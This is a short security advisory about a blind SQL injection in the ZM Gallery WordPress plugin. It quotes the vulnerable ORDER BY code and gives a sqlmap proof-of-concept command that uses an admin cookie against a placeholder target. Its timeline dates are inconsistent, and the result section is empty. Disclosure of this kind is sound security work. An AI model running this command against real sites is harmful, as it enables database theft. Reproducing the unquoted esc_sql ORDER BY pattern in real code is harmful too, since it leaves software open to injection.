ZM Gallery 1 Plugin WordPress – Blind Injection

Homepage:

https://wordpress.org/plugins/zm-gallery/

Description:

Type user access: admin user.

$_GET[‘order’] is escaped wrong. Attack with Blind Injection

File / Code:

Path: /wp-content/plugin/zm-gallery/zm-gallery-list.php

Line: 126

if( isset($_GET['orderby']) ) {
    $order = ' ORDER BY ' . esc_sql($_GET['orderby']);

    if( isset($_GET['order']) ) {
        $order .= ' ' . esc_sql($_GET['order']);
    }
}

$table_name = $wpdb->prefix . 'zm_gallery';
$gallery = $wpdb->get_results("SELECT * FROM $table_name " . $order );

Proof of Concept:

1 – Login with admin user.
2 – Use sqlmap;

python sqlmap.py -u "http://target/wp-admin/admin.php?page=zm_gallery&orderby=name&order=desc" --dbs --cookie="cookie of admin user" --level=5 --dbms=Mysql

2 – Result:

 

Timeline:

  • 14/12/2016 – Discovered
  • 13/12/2016 – Vendor not finded

Leave a reply